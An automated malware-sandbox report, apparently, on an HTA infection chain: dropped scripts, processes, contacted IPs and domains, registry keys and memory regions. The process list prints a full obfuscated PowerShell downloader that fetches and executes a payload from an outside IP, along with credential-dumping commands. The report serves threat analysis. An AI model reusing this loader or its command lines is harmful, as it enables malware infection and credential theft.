Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
earereallyniceloverwithgreatthingsonthatkissinggirlonme.hta
|
HTML document, ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Windows\Temp\nonordinary.vbs
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Windows\Temp\unmovably.bat
|
DOS batch file, ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\0[1].txt
|
Unicode text, UTF-8 text, with very long lines (23046), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2we2yiwa.2u1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zsf31zgs.iqu.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhv92F0.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x046d5b64, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\pzydemearwfqxhycxyyxvgk
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
|
\Device\Null
|
ASCII text, with CRLF line terminators, with overstriking
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\SysWOW64\mshta.exe
|
mshta.exe "C:\Users\user\Desktop\earereallyniceloverwithgreatthingsonthatkissinggirlonme.hta"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\unmovably.bat
|
|
|
|
C:\Windows\SysWOW64\wscript.exe
|
wscript //nologo "C:\Windows\Temp\nonordinary.vbs"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#B0#GU#cgBy#GE#YwBp#G4#ZwBz#C##PQ#g#Cc#d#B4#HQ#LgBl#G0#bgBv#Gw#cgBp#Gc#ZwBu#Gk#cwBz#Gk#awB0#GE#a#B0#G4#bwBz#Gc#bgBp#Gg#d#B0#GE#ZQBy#Gc#a#B0#Gk#dwBy#GU#dgBv#Gw#ZQBj#Gk#bgB5#Gw#b#Bh#GU#cgBl#HI#YQBl#Hc#Lw#w#DY#Ng#v#Dg#O##u#DE#OQ#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#GI#YQBy#GI#bwB0#Gk#bgBl#C##PQ#g#CQ#d#Bl#HI#cgBh#GM#aQBu#Gc#cw#g#C0#cgBl#H##b#Bh#GM#ZQ#g#Cc#Iw#n#Cw#I##n#HQ#Jw#7#CQ#bQBh#HM#cwBp#GU#cg#g#D0#I##n#Gg#d#B0#H##Og#v#C8#MQ#w#DQ#Lg#x#DY#O##u#Dc#Lg#z#Dg#LwB4#GE#bQBw#H##LwBz#HY#LwBF#E4#QwBS#Fk#U#BU#Ek#TwBO#D##MQ#u#Go#c#Bn#Cc#Ow#k#GU#cQB1#Gk#dgBh#Gw#dgB1#Gw#YQBy#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#C##PQ#g#CQ#ZQBx#HU#aQB2#GE#b#B2#HU#b#Bh#HI#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBh#HM#cwBp#GU#cg#p#Ds#J#BN#GE#bgBp#Gw#awBh#HI#YQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#Ck#Ow#k#Fo#aQBt#GI#YQBi#Hc#ZQBh#G4#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#YQB6#G8#d#Bl#GQ#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#WgBp#G0#YgBh#GI#dwBl#GE#bgBz#Ck#Ow#k#Gs#bgBp#HQ#YwBo#GU#d##g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YQB6#G8#d#Bl#GQ#KQ#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#Gs#bgBp#HQ#YwBo#GU#d##g#C0#ZwB0#C##J#Bl#G4#d#Bl#HI#bwBu#Ds#J#Bl#G4#d#Bl#HI#bwBu#C##Kw#9#C##J#Ba#Gk#bQBi#GE#YgB3#GU#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#bQBh#HQ#a#Bl#G0#YQB0#Gk#YwBz#C##PQ#g#CQ#awBu#Gk#d#Bj#Gg#ZQB0#C##LQ#g#CQ#ZQBu#HQ#ZQBy#G8#bg#7#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#I##9#C##J#BN#GE#bgBp#Gw#awBh#HI#YQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bl#G4#d#Bl#HI#bwBu#Cw#I##k#G0#YQB0#Gg#ZQBt#GE#d#Bp#GM#cw#p#Ds#J#Bj#G8#bQBl#GQ#aQBl#G4#bgBl#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#KQ#7#CQ#bwB1#HQ#cgBl#GE#YwBo#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#ZQBk#Gk#ZQBu#G4#ZQBz#Ck#Ow#k#HY#YQBs#GU#d#B1#GQ#aQBu#GE#cgBp#GE#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bi#GE#cgBi#G8#d#Bp#G4#ZQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#p#Ck#';
$OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression
$OWjuxd"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
|
|
|
|
C:\Windows\SysWOW64\recover.exe
|
C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\pzydemearwfqxhycxyyxvgk"
|
|
|
|
C:\Windows\SysWOW64\recover.exe
|
C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\pzydemearwfqxhycxyyxvgk"
|
|
|
|
C:\Windows\SysWOW64\recover.exe
|
C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\audwwwpufexvznugobtqylfphx"
|
|
|
|
C:\Windows\SysWOW64\recover.exe
|
C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\cwjoxpavbmpaktikxmgsjyayqdsfy"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\timeout.exe
|
timeout /t 1 /nobreak
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 2 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://104.168.7.38/xampp/sv/ENCRYPTION01.jpg
|
104.168.7.38
|
|
|
|
http://172.245.191.88/660/wearereallyniceloverwithgreatthingsonthatkissinggirlonme.txt
|
172.245.191.88
|
|
|
|
qwertyuioplkjhgfdsazxcvbnm.ydns.eu
|
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.imvu.comr
|
unknown
|
||
|
http://geoplugin.net/json.gp&
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://104.168.7.38
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://172.245.191.88
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
http://www.nirsoft.net
|
unknown
|
||
|
http://geoplugin.net/json.gpTX
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
|
https://github.com/koswald/VBScript/blob/master/SetupPerUser.md
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
https://www.google.com
|
unknown
|
||
|
https://paste.ee/d/h0hNZ9qO/0H~
|
unknown
|
||
|
http://geoplugin.net/json.gp/C
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://paste.ee/d/h0hNZ9qO/99
|
unknown
|
||
|
https://paste.ee/
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
https://github.com/koswald/VBScriptB
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
https://github.com/koswald/VBScript
|
unknown
|
||
|
http://www.imvu.comata
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://paste.ee/d/h0hNZ9qO/0
|
23.186.113.60
|
||
|
https://secure.gravatar.com
|
unknown
|
||
|
https://themes.googleusercontent.com
|
unknown
|
||
|
https://github.com/dahall/taskscheduler
|
unknown
|
||
|
https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbsP
|
unknown
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 37 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
qwertyuioplkjhgfdsazxcvbnm.ydns.eu
|
185.208.156.45
|
|
|
|
paste.ee
|
23.186.113.60
|
||
|
geoplugin.net
|
178.237.33.50
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
104.168.7.38
|
unknown
|
United States
|
|
|
|
172.245.191.88
|
unknown
|
United States
|
|
|
|
185.208.156.45
|
qwertyuioplkjhgfdsazxcvbnm.ydns.eu
|
Switzerland
|
|
|
|
23.186.113.60
|
paste.ee
|
Reserved
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-4E8SNN
|
exepath
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-4E8SNN
|
licence
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-4E8SNN
|
time
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-4E8SNN
|
UID
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 9 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
E18000
|
heap
|
page read and write
|
|
|
|
5A28000
|
trusted library allocation
|
page read and write
|
|
|
|
5671000
|
trusted library allocation
|
page read and write
|
|
|
|
37E0000
|
unclassified section
|
page execute and read and write
|
|
|
|
400000
|
system
|
page execute and read and write
|
|
|
|
3640000
|
heap
|
page read and write
|
||
|
5231000
|
heap
|
page read and write
|
||
|
35F8000
|
heap
|
page read and write
|
||
|
5231000
|
heap
|
page read and write
|
||
|
3698000
|
heap
|
page read and write
|
||
|
3176000
|
heap
|
page read and write
|
||
|
6CF8000
|
heap
|
page read and write
|
||
|
6F40000
|
trusted library allocation
|
page read and write
|
||
|
4A91000
|
trusted library allocation
|
page read and write
|
||
|
7C30000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C4D000
|
heap
|
page read and write
|
||
|
5231000
|
heap
|
page read and write
|
||
|
63E000
|
stack
|
page read and write
|
||
|
2C94000
|
heap
|
page read and write
|
||
|
3C50000
|
heap
|
page read and write
|
||
|
3695000
|
heap
|
page read and write
|
||
|
2C94000
|
heap
|
page read and write
|
||
|
604C000
|
heap
|
page read and write
|
||
|
31F8000
|
heap
|
page read and write
|
||
|
553B000
|
stack
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
F7A000
|
stack
|
page read and write
|
||
|
7F0000
|
heap
|
page read and write
|
||
|
4C45000
|
heap
|
page read and write
|
||
|
4C49000
|
heap
|
page read and write
|
||
|
4D30000
|
trusted library allocation
|
page read and write
|
||
|
55D8000
|
heap
|
page read and write
|
||
|
4C79000
|
heap
|
page read and write
|
||
|
4C97000
|
heap
|
page read and write
|
||
|
4C84000
|
heap
|
page read and write
|
||
|
7FB000
|
stack
|
page read and write
|
||
|
4C49000
|
heap
|
page read and write
|
||
|
6575000
|
trusted library allocation
|
page read and write
|
||
|
4C65000
|
heap
|
page read and write
|
||
|
33B4000
|
heap
|
page read and write
|
||
|
6730000
|
heap
|
page execute and read and write
|
||
|
4C6C000
|
heap
|
page read and write
|
||
|
B8D000
|
stack
|
page read and write
|
||
|
BEF000
|
stack
|
page read and write
|
||
|
BF4000
|
stack
|
page read and write
|
||
|
31CF000
|
heap
|
page read and write
|
||
|
31EC000
|
heap
|
page read and write
|
||
|
2FC5000
|
heap
|
page read and write
|
||
|
33B4000
|
heap
|
page read and write
|
||
|
6B0D000
|
stack
|
page read and write
|
||
|
7B60000
|
trusted library allocation
|
page read and write
|
||
|
840000
|
trusted library allocation
|
page read and write
|
||
|
4C64000
|
heap
|
page read and write
|
||
|
35B0000
|
trusted library allocation
|
page read and write
|
||
|
4C40000
|
heap
|
page read and write
|
||
|
2C94000
|
heap
|
page read and write
|
||
|
2C94000
|
heap
|
page read and write
|
||
|
31CF000
|
heap
|
page read and write
|
||
|
31BC000
|
heap
|
page read and write
|
||
|
605E000
|
heap
|
page read and write
|
||
|
4C50000
|
heap
|
page read and write
|
||
|
31EF000
|
heap
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
4C49000
|
heap
|
page read and write
|
||
|
33B4000
|
heap
|
page read and write
|
||
|
3970000
|
heap
|
page read and write
|
||
|
5CDC000
|
stack
|
page read and write
|
||
|
C40000
|
heap
|
page read and write
|
||
|
4C65000
|
heap
|
page read and write
|
||
|
31B0000
|
heap
|
page read and write
|
||
|
60A0000
|
heap
|
page read and write
|
||
|
317A000
|
heap
|
page read and write
|
||
|
B29000
|
stack
|
page read and write
|
||
|
33B4000
|
heap
|
page read and write
|
||
|
4C5E000
|
heap
|
page read and write
|
||
|
3161000
|
heap
|
page read and write
|
||
|
3151000
|
heap
|
page read and write
|
||
|
4C41000
|
heap
|
page read and write
|
||
|
9DC000
|
stack
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
4C69000
|
heap
|
page read and write
|
||
|
E55000
|
heap
|
page read and write
|
||
|
312B000
|
heap
|
page read and write
|
||
|
3020000
|
heap
|
page read and write
|
||
|
31E6000
|
heap
|
page read and write
|
||
|
6855000
|
heap
|
page read and write
|
||
|
3181000
|
heap
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
31D3000
|
heap
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
2C94000
|
heap
|
page read and write
|
||
|
3683000
|
heap
|
page read and write
|
||
|
33B4000
|
heap
|
page read and write
|
||
|
52A0000
|
heap
|
page read and write
|
||
|
4C5E000
|
heap
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
316D000
|
heap
|
page read and write
|
||
|
2BD0000
|
heap
|
page read and write
|
||
|
3854000
|
unclassified section
|
page execute and read and write
|
||
|
4C41000
|
heap
|
page read and write
|
||
|
61E8000
|
heap
|
page read and write
|
||
|
33B4000
|
heap
|
page read and write
|
||
|
5300000
|
heap
|
page read and write
|
||
|
3000000
|
heap
|
page read and write
|
||
|
6C4E000
|
stack
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
4C41000
|
heap
|
page read and write
|
||
|
3176000
|
heap
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
4C40000
|
heap
|
page read and write
|
||
|
4C4F000
|
heap
|
page read and write
|
||
|
4E0000
|
heap
|
page read and write
|
||
|
3BEC000
|
unclassified section
|
page execute and read and write
|
||
|
4914000
|
trusted library allocation
|
page read and write
|
||
|
319C000
|
heap
|
page read and write
|
||
|
4C41000
|
heap
|
page read and write
|
||
|
6AA0000
|
heap
|
page read and write
|
||
|
3027000
|
heap
|
page read and write
|
||
|
5231000
|
heap
|
page read and write
|
||
|
36AD000
|
heap
|
page read and write
|
||
|
75C0000
|
heap
|
page read and write
|
||
|
368F000
|
stack
|
page read and write
|
||
|
369F000
|
heap
|
page read and write
|
||
|
4C41000
|
heap
|
page read and write
|
||
|
33B4000
|
heap
|
page read and write
|
||
|
90D0000
|
trusted library section
|
page read and write
|
||
|
B40000
|
heap
|
page readonly
|
||
|
340E000
|
stack
|
page read and write
|
||
|
368E000
|
heap
|
page read and write
|
||
|
4C41000
|
heap
|
page read and write
|
||
|
30A4000
|
heap
|
page read and write
|
||
|
690E000
|
stack
|
page read and write
|
||
|
4C4C000
|
heap
|
page read and write
|
||
|
2C94000
|
heap
|
page read and write
|
||
|
3138000
|
heap
|
page read and write
|
||
|
366E000
|
heap
|
page read and write
|
||
|
3138000
|
heap
|
page read and write
|
||
|
4C5E000
|
heap
|
page read and write
|
||
|
605B000
|
heap
|
page read and write
|
||
|
2C95000
|
heap
|
page read and write
|
||
|
685E000
|
heap
|
page read and write
|
||
|
4C5E000
|
heap
|
page read and write
|
||
|
5F90000
|
remote allocation
|
page read and write
|
||
|
4CA8000
|
heap
|
page read and write
|
||
|
2ECC000
|
stack
|
page read and write
|
||
|
3640000
|
heap
|
page read and write
|
||
|
6C0E000
|
stack
|
page read and write
|
||
|
53E0000
|
heap
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
36BF000
|
heap
|
page read and write
|
||
|
6009000
|
heap
|
page read and write
|
||
|
561F000
|
heap
|
page read and write
|
||
|
920000
|
trusted library allocation
|
page read and write
|
||
|
90B0000
|
trusted library allocation
|
page read and write
|
||
|
677F000
|
stack
|
page read and write
|
||
|
6840000
|
heap
|
page read and write
|
||
|
E95000
|
heap
|
page read and write
|
||
|
55D7000
|
heap
|
page read and write
|
||
|
31E6000
|
heap
|
page read and write
|
||
|
3C1B000
|
unclassified section
|
page execute and read and write
|
||
|
2C94000
|
heap
|
page read and write
|
||
|
4D4E000
|
stack
|
page read and write
|
||
|
E86000
|
heap
|
page read and write
|
||
|
43C000
|
stack
|
page read and write
|
||
|
30FE000
|
stack
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
36A1000
|
heap
|
page read and write
|
||
|
61BD000
|
heap
|
page read and write
|
||
|
935000
|
trusted library allocation
|
page read and write
|
||
|
337E000
|
stack
|
page read and write
|
||
|
30A6000
|
heap
|
page read and write
|
||
|
3127000
|
heap
|
page read and write
|
||
|
31F8000
|
heap
|
page read and write
|
||
|
4A83000
|
trusted library allocation
|
page read and write
|
||
|
33B4000
|
heap
|
page read and write
|
||
|
561E000
|
heap
|
page read and write
|
||
|
5F5F000
|
stack
|
page read and write
|
||
|
4C5E000
|
heap
|
page read and write
|
||
|
36CA000
|
heap
|
page read and write
|
||
|
4B7000
|
heap
|
page read and write
|
||
|
364B000
|
heap
|
page read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
70A0000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
521E000
|
stack
|
page read and write
|
||
|
3190000
|
heap
|
page read and write
|
||
|
6AE000
|
heap
|
page read and write
|
||
|
33B4000
|
heap
|
page read and write
|
||
|
31CB000
|
heap
|
page read and write
|
||
|
2D0D000
|
stack
|
page read and write
|
||
|
3181000
|
heap
|
page read and write
|
||
|
C8E000
|
stack
|
page read and write
|
||
|
5590000
|
heap
|
page read and write
|
||
|
3686000
|
heap
|
page read and write
|
||
|
5231000
|
heap
|
page read and write
|
||
|
3177000
|
heap
|
page read and write
|
||
|
5231000
|
heap
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
5231000
|
heap
|
page read and write
|
||
|
317D000
|
heap
|
page read and write
|
||
|
854000
|
trusted library allocation
|
page read and write
|
||
|
BCE000
|
stack
|
page read and write
|
||
|
5EC0000
|
heap
|
page read and write
|
||
|
7C10000
|
heap
|
page read and write
|
||
|
31CB000
|
heap
|
page read and write
|
||
|
499D000
|
trusted library allocation
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
542F000
|
stack
|
page read and write
|
||
|
31BC000
|
heap
|
page read and write
|
||
|
2C70000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
604C000
|
heap
|
page read and write
|
||
|
4C5E000
|
heap
|
page read and write
|
||
|
690000
|
heap
|
page read and write
|
||
|
61FC000
|
heap
|
page read and write
|
||
|
5601000
|
trusted library allocation
|
page read and write
|
||
|
5EE0000
|
heap
|
page read and write
|
||
|
552F000
|
stack
|
page read and write
|
||
|
36A3000
|
heap
|
page read and write
|
||
|
2C94000
|
heap
|
page read and write
|
||
|
360E000
|
heap
|
page read and write
|
||
|
E10000
|
heap
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
514F000
|
heap
|
page read and write
|
||
|
3110000
|
heap
|
page read and write
|
||
|
4C41000
|
heap
|
page read and write
|
||
|
36FD000
|
heap
|
page read and write
|
||
|
2C94000
|
heap
|
page read and write
|
||
|
4C41000
|
heap
|
page read and write
|
||
|
6008000
|
heap
|
page read and write
|
||
|
51BE000
|
stack
|
page read and write
|
||
|
366E000
|
heap
|
page read and write
|
||
|
5D1E000
|
stack
|
page read and write
|
||
|
5231000
|
heap
|
page read and write
|
||
|
5580000
|
heap
|
page read and write
|
||
|
850000
|
trusted library allocation
|
page read and write
|
||
|
6248000
|
heap
|
page read and write
|
||
|
31CF000
|
heap
|
page read and write
|
||
|
31B3000
|
heap
|
page read and write
|
||
|
70E0000
|
trusted library allocation
|
page read and write
|
||
|
31EC000
|
heap
|
page read and write
|
||
|
36FD000
|
heap
|
page read and write
|
||
|
2EEC000
|
stack
|
page read and write
|
||
|
61F3000
|
heap
|
page read and write
|
||
|
90C0000
|
trusted library allocation
|
page read and write
|
||
|
3445000
|
heap
|
page read and write
|
||
|
5E5D000
|
stack
|
page read and write
|
||
|
3C00000
|
unclassified section
|
page execute and read and write
|
||
|
56BE000
|
stack
|
page read and write
|
||
|
2C80000
|
heap
|
page readonly
|
||
|
D5C000
|
stack
|
page read and write
|
||
|
4C20000
|
heap
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
6FAE000
|
stack
|
page read and write
|
||
|
36BF000
|
heap
|
page read and write
|
||
|
E9F000
|
heap
|
page read and write
|
||
|
54EF000
|
stack
|
page read and write
|
||
|
5C3E000
|
stack
|
page read and write
|
||
|
2A0E000
|
stack
|
page read and write
|
||
|
4DCF000
|
stack
|
page read and write
|
||
|
2C94000
|
heap
|
page read and write
|
||
|
66BE000
|
stack
|
page read and write
|
||
|
698E000
|
stack
|
page read and write
|
||
|
31EC000
|
heap
|
page read and write
|
||
|
4C5A000
|
heap
|
page read and write
|
||
|
3129000
|
heap
|
page read and write
|
||
|
4C61000
|
heap
|
page read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
6AA1000
|
heap
|
page read and write
|
||
|
56C4000
|
heap
|
page read and write
|
||
|
90B9000
|
trusted library allocation
|
page read and write
|
||
|
5231000
|
heap
|
page read and write
|
||
|
3680000
|
heap
|
page read and write
|
||
|
4C5E000
|
heap
|
page read and write
|
||
|
BD0000
|
heap
|
page read and write
|
||
|
365F000
|
heap
|
page read and write
|
||
|
31E6000
|
heap
|
page read and write
|
||
|
6A8F000
|
stack
|
page read and write
|
||
|
358E000
|
stack
|
page read and write
|
||
|
6F7C000
|
stack
|
page read and write
|
||
|
2FEE000
|
stack
|
page read and write
|
||
|
31EC000
|
heap
|
page read and write
|
||
|
94B000
|
heap
|
page read and write
|
||
|
529F000
|
stack
|
page read and write
|
||
|
69D0000
|
heap
|
page read and write
|
||
|
4C7E000
|
heap
|
page read and write
|
||
|
36BF000
|
heap
|
page read and write
|
||
|
326F000
|
stack
|
page read and write
|
||
|
326F000
|
heap
|
page read and write
|
||
|
61C0000
|
heap
|
page read and write
|
||
|
4601000
|
trusted library allocation
|
page read and write
|
||
|
61A2000
|
heap
|
page read and write
|
||
|
358F000
|
stack
|
page read and write
|
||
|
7160000
|
trusted library allocation
|
page read and write
|
||
|
7150000
|
trusted library allocation
|
page read and write
|
||
|
5231000
|
heap
|
page read and write
|
||
|
4C40000
|
heap
|
page read and write
|
||
|
2C94000
|
heap
|
page read and write
|
||
|
3176000
|
heap
|
page read and write
|
||
|
8C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3171000
|
heap
|
page read and write
|
||
|
5591000
|
heap
|
page read and write
|
||
|
4C50000
|
heap
|
page read and write
|
||
|
